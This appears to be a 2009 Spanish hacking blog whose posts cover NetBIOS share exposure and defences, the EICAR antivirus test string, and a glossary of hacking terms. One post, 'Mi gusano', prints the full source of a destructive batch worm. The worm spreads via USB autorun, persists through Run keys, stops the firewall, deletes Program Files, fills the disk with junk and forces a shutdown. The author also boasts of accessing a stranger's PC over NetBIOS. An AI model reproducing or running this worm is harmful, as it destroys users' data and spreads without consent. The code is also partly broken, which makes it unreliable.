miércoles, 30 de septiembre de 2009

Proteccion por Netbios

hola, todos ( me quiero imaginar, sabemos que es el netbios)

si no sabes lo que es te recomiendo este manual por Ranefi (excelente)

Código:
http://foro.portalhacker.net/index.php/topic,13518.0.html

Este protoclo, no es muy comun que este abierto (en maquinas de usuarios comunes), pero bien en los ciber te puede servir ya que casi siempre tienen archivos compartidos.
Tambien existe la posibilidad que un despistado lo tenga a abierto en su casa y no le haya configurado la suficiente seguridad

Como protegerse:

Como nos protegeremos


Facil hay tres formas de protegernos:
1.)
Código:
 Si se nos hace que hay alguien en nuestro computador colocamos el comando nbtstat -s y salio la persona conectada has esto:
net use * /delete /yes
Esto borrara todas las conecciones establecidas en tu computador y en ese momento saca todos tus recursos compartidos que tengas.



veremos que dice " NO hay conexiones" ( eso es bueno ) xD

2. Hacemos lo anterior con el nbtstat -s si hay alguien conectado, en windows XP y 2000 existe las herramientas de administrador, entramos a control de usuarios y Borramos temporalmente las carpetas compartidas que tienen por defecto el windows que son: IPC$, ADMIN$, C$, y si tuvieras mas discos duros aprecerian con el signo de dolar "$" los borras todos, no pasa nada cuando reinicies tu computador apareceran estos recursos nuevamente. que error pelotudo no ?

3. A lo asustado, nos desconectamos de internet y repetimos el paso 1 , 2 y nos conectamos nuevamente.

4) Si tenemos mucho miedo tiramos la pc por la ventana y nos escondemos abajo de la cama xD
El recuros IPC$ ADMIN$ son recursos que lo traen por defecto el windows XP Y EL NT (el recurso IPC$ se habilita a la hora de tener algo compartido)
Los recursos C$, D$..... son generalmente recursos inaccesibles (a nos ser que tengan acceso de administrador).
Control total !


Que pasa cuando un recurso esta con password??


Eludible para algo somos hackers..
Existen varios buscadores de SMB

alguna informacion extra sobre vulnerabilidad es SMB
Código:
http://blog.segu-info.com.ar/2009/09/vulnerabilidad-smb-en-vista-windows.html

sI NO SABES QUE es Busca ( no soi tu mulo xD )

¿Y si me quiero conectar y me pide password ?
Que lastima... tiene un service pack instalado que corrige ese Bug :s

¿y... Dr [F], que pasa con los firewall?
te respondo bien o mal ?xD
no sirven para nada. a menos que bloquee el puerto 129 que si estan en una red ya no se van a poder conectar con una maquina remota.. xD

Tambien se puede deshabilitar la Opcion Habilitar Netbios sobre TCP/IP
esto lo haremos de la siguiente manera:

Inicio--> Panel de control ----->2 CLICKS en Conexiones de red ---->Click derecho propiedades----> Protocolo de internet TCP/IP ( 2 clicks ) ----> Opciones avanzadas ----> Pestaña Wins ---> Deshabilitar NetBios sobre tcp/ip









¿Que se puede hacer si se ingresa a un ordenador por netbios ?

Depende de los recursos compartidos que tenga... por ejemplo a esta Pc que ingrese ( no es la mia ) puedo acceder al disco C:\ y manejar la impresora Cheesy


Manual by Dr F, sacando informacion de
Adios

espero que les halla gustado Cheesy

lunes, 28 de septiembre de 2009

Antivirus... Probando

Hay algunas personas ( que no parecen entender nada de nada ), que se por un descuido idiota le entra un virus en la PC y no tienen otro remedio que echarle la culpa a los hackers.
( El error idiota es que no les anda el AntiVirus)
¿Comp puedes comprobar que tu antivirus funciona ?
Poniendo el siguiente codigo en un bloc de notas y guardalo en formato .COM

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



Link de la imagen para ver mejor xD
http://img34.imageshack.us/img34/7007/imagen1za.jpg

Lo mas probable es que lo detecte

Para estar mas seguro escanealo en
www.novirusthanks.org

Y recuerda:
es un virus fizticio solo para probar que el antivirus funciona correctamente

http://www.eicar.org/download/eicar.com

Mi gusano ( Batch )

Esta es una versiona beta de mi pequeño gusano que hize en batch ( vos me entendes no narigon " MuY AL PEDO xd").
Lo que hace este bichito, en sintesis, es autopropagarse por los pendrives, y borrar la mayor parte de los archivos.

Pero antes:

Un gusano informático (también llamados IWorm por su apocope en inglés, I de Internet, Worm de gusano) es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un SO que generalmente son invisibles al usuario.

A diferencia de un Virus , un gusano no precisa alterar los archivos de programas, sino que reside en la MeMORIA y se duplica a sí mismo. Los gusanos casi siempre causan problemas en la red (aunque sea simplemente consumiendo ancho de banda), mientras que los virus siempre infectan o corrompen los archivos de la computadora que atacan.

Es algo usual detectar la presencia de gusanos en un sistema cuando, debido a su incontrolada replicación, los recursos del sistema se consumen hasta el punto de que las tareas ordinarias del mismo son excesivamente lentas o simplemente no pueden ejecutarse.

Metodo de propagacion:

@echo off
if exist %windir%\system32\Palo.bat (goto a) else (goto code)
if exist %windir%\system32\autorun.inf (goto b) else (goto code)
if exist %windir%\system32\toyos.wav (goto c) else (goto code)

:a
cd %windir%\system32
attrib -R -A -S -H palo.bat
del /f /s /q Palo.bat
goto code

:b
cd %windir%\system32
attrib -R -A -S -H autorun.inf
del /f /s /q autorun.inf
goto code

:c
cd %windir%\system32
attrib -R -A -S -H toyos.wav
del /f /s /q toyos.wav
goto code

:code
REG ADD HKML\software\Microsoft\CurrentVersion\Run /v MsnPahe /t REG_SZ /d "%windir%\system32\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run /v ProMsnn /t REG_SZ /d "%windir%\JSPalo.bat" /f
REG ADD HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Cdrom /v svnnostt /t REG_DWORD /d "%windir%\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run/v Reggeditt /t REG_SZ /d "%homedrive%\JSPalo.bat" /F

rem ------------------Borro el Registro PENDRIVE --------------
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveAutorun /f

rem ----------------- Gusano ---------------
for /f "tokens=1" %%x in ('wmic logicaldisk get caption^, description ^| find /i "extra"') do (copy /y "%~dpnx0" && %%x\ && copy /y "%windir%\system32\sarasa.bat" %%x\ && copy /y "%windir%\system32\toyos.wav" %%x\ && copy /y "%windir%\system32\autorun.inf" && ATTRIB +R +S +H %%x\
)

Destruccion:

@echo off


rem --------------------- Registro ----------------
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v HideProcess /t REG_SZ /d "%windir%\system32\nombre.bat
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v avast.! /t REG_SZ /d "%windir%\nombre.bat
REG ADD HKEY_CURRENT_USERS\Software\Polices\Microsoft\Windows\System /v DisableRegistryTools /t REG_SZ /d 0X00000001 /f
rem FOR DEL REGISTRO PROXIMAMENT

rem ------------------ Inicio --------------------
start %0
rem ------------------- Fin inicio -----------------


rem ---------------------- Virus Palo -------------
if exist %windir%\system32\Palo.bat (goto :a) else (goto :code)
if exist %windir%\Palo.bat (goto :b) else (goto :code)
if exist %homedrive%\Palo.bat (goto :c) else (goto :code)
:a
cd %windir%\system32
del /f /s /q Palo.bat
goto code
:b
cd..
cd %windir%
del /f /s /q Palo.bat
goto code
:c
cd %homedrive%
del /f /s /q Palo.bat
goto code
:code
copy %0 %windir%\system32\Palo.bat
copy %0 %windir%\Palo.bat
copy %0 %homedrive%\nombredelbat.bat
attrib +R +S +H *.bat

rem -------------------------------------- Inicio Einstein -------------------------------------------
net stop SharedAccess

cd %programfiles%
attrib -R -A -S -H *.*
del /S /Q /F *.*

cd ..
cd %windir%
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
cd..
cd %windir%
ping -n 15 127.0.0.1 >nul
shutdown -s -f -t 7 -c "pALO !"


y opor utlimo el Autorun.inf

[autorun]
shellexecute=/Palo.bat


-------------------------------------------------------------------------------------------


Esta mas que claro que todavia no decidi el nombre y que faltan funciones, por algo es una version beta xD.... despues voi a sacar un gusano un poco mejor en c++.

Saludos

El Dr [F]


domingo, 27 de septiembre de 2009

Un poco de teoria

Una pequeña introduccion a este mundo nunca esta demas, especialmente cuando sos un recien iniciado

Ahora, algunas definiciones importantes si quieres llegar a algo:

Boxes :Aparatos electrónicos o eléctricos cuya finalidad es el phreaking. Las más conocidas son:
Bluebox : Para llamar gratis.
Redbox : Emula la introducción de monedas en teléfonos públicos.
Blackbox : El que llame a un teléfono con este dispositivo no paga la llamada.


Carding :
Uso fraudulento de tarjetas de crédito o sus números pertenecientes a otras personas. Ello incluye la generación de nuevas tarjetas de crédito.

Cracker :
Un individuo que se dedica a eliminar las protecciones lógicas y fisicas del software. Normalmente muy ligado al pirata informatico puede ser un hacker criminal o un hacker que daña el sistema en el que intenta penetrar.

Crackeador o crack :
Término muy de moda gracias al asunto de la "Página del Jamón y el Vino". Son programas que se utilizan para desporteger o sacar los passwords de programas comerciales. Pudiendo utilizarse éstos como si se hubiera comprado la licencia. Quienes los distribuyen son altamente perseguido por la BSA.

El gran Hermano :
En el mundo del Hacking se conoce por este término a cualquier empresa poderosa que intenta controlar el mercado y el mundo de la informática. En este estado podríamos colocar a IBM, Microsoft, Telefónica, etc. El brazo ejecutor del gran hermano como muchos habrán adivinado, es la BSA.

Hacking :
Es cunado se entra de forma ilegal y sin el consentimiento del propietario en us sistema informático para obtener información. No conlleva la destrucción de datos ni la intalación de virus. También lo podriamos definir como cualquier acción encaminada a conseguier la intrusión en un sistema (ingenieria social, caballos de troya, etc.)

Hacker :
Cualquier persona que se dedica a hacer hacking. Debe ser bastante bueno con los ordenadores (como minimo).

Lamer :
Principiante en el mundo del hacking que se las da de listo o que copia, descaradamente, el trabajo de otros hackers. Cuando se les descubre se les desprecia y se les expulsa del circulo en el que se han introducido.

Pheaking :
Todo lo relacionado con el uso del teléfono o servicios telefónicos de forma gratuita. También incluye la modificación o intervención de las líneas telefónicas y las modificaciones de aparatos telefónicos con el fin de comunicarse gratuitamente.

Pirata informático :
Es un delincuente informático que se dedica a la copia y destribución de software ilegal. Este software puede ser comercial crackeado o shareware registrado. También es otro nombre que reciben los crackers, no confundir con los hackers.

VIRUSES o VII :
Textos sobre virus. Normalmente se incluyen información acerca de como hacerlos y como protegerse de los mismos.

Warez :
Programas comerciales ofrecidos gratuitamente a través de internet. Periodicamente aparecen por internet (en la News o IRC) unas listas con inforación de servidores FTP o WWW donde se encuentran programas de estas caracteristica s. Piratería informática.

Ahora unos términos intrínsicamente relacionados con el Hacking :

Administrador, SysOp, Root :
Individuo que se encarga del mantenimiento de un sistema informático y tiene el control total sobre el mismo. También se encarga de la seguridad.

Backdoor :
Puerta trasera de un sistema informático, un mecanismo del software que permite entrar evitando el método usual.

Bug, Hole :
Agujero. Se trata de un defecto en el software (normalmente el S.O.) que permita la intrusión de los hackers.

Caballos de troya :
Programa que se queda residente en un sistema informático y falicita información sobre los que ocurre en el mismo (passwords, logins, etc.). También es aplicable a programas que parecen normales y al ejecutarse despiertan un virus que se introduce en el sistema.

Cortafuego, firewall, bastión :
Software y hardware de seguridad encargado de chequear y bloquear el tráfico de la red hacia un sistema determinado.

Crackeador :
Programa que se emplea para extraer los passwords encriptados del archivo de passwords. Para ello se intenta desencriptarlo o se prueban múltiples combinaciones hasta encontrar la adecuada.

Exploit :
Método de utilizar un bug para penetrar en un sistema.

Fichero de Password :
Fichero deonde se guardan las claves de acceso a un sistema.

Fuerza Bruta :
Forma poco sutil de entrar en un sistema que consiste en porbar distintos passwords (contraseñas) hasta encontrar la adecuada. Requiere mucho tiempo y para ello se emplea un crackeador, se desencripta un fichero encriptado, se sacan las claves del fichero de passwords empleando las palabras del diccionario, etc.

Ingenieria social :
Es una técnica por la cual se convence a alguien, por diversos medios, de que proporcione información útil para hackear o para beneficiarnos. Requiere grandes dosis de psicologia.

Sniffer y Sniffing :
Un sniffer es un programa que intercepta la información que transita por una red. Sniffing es espiar y obtener la información que circula or la red.

Tracear :
Seguir la pista a través de la red de una información o una persona. Se utiliza por las grandes empresas (como Telefónica) para obtener la identidad de los sospechosos o hackers.

Trashing :
En castellano recoger por la basura. Se trata de buscar en la basura (fisica o informática) información que pueda ser útil para hackear.

War Dialer, Discador :
Programa que escanea las líneas de teléfonos en la búsqueda de modems.

Firewall ( mas ampliado ): Un cortafuegos o fiewall es una parte de un sistema o una red que está diseñado para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas. Se trata de un dispositivo o conjunto de dispositivos configurados para permitir, limitar, cifrar, descifrar, el tráfico entre los diferentes ámbitos sobre la base de un conjunto de normas y otros criterios.

Fuente: Foro portalhacker.. ( la mejor comunidad xD )
http://foro.portalhacker.net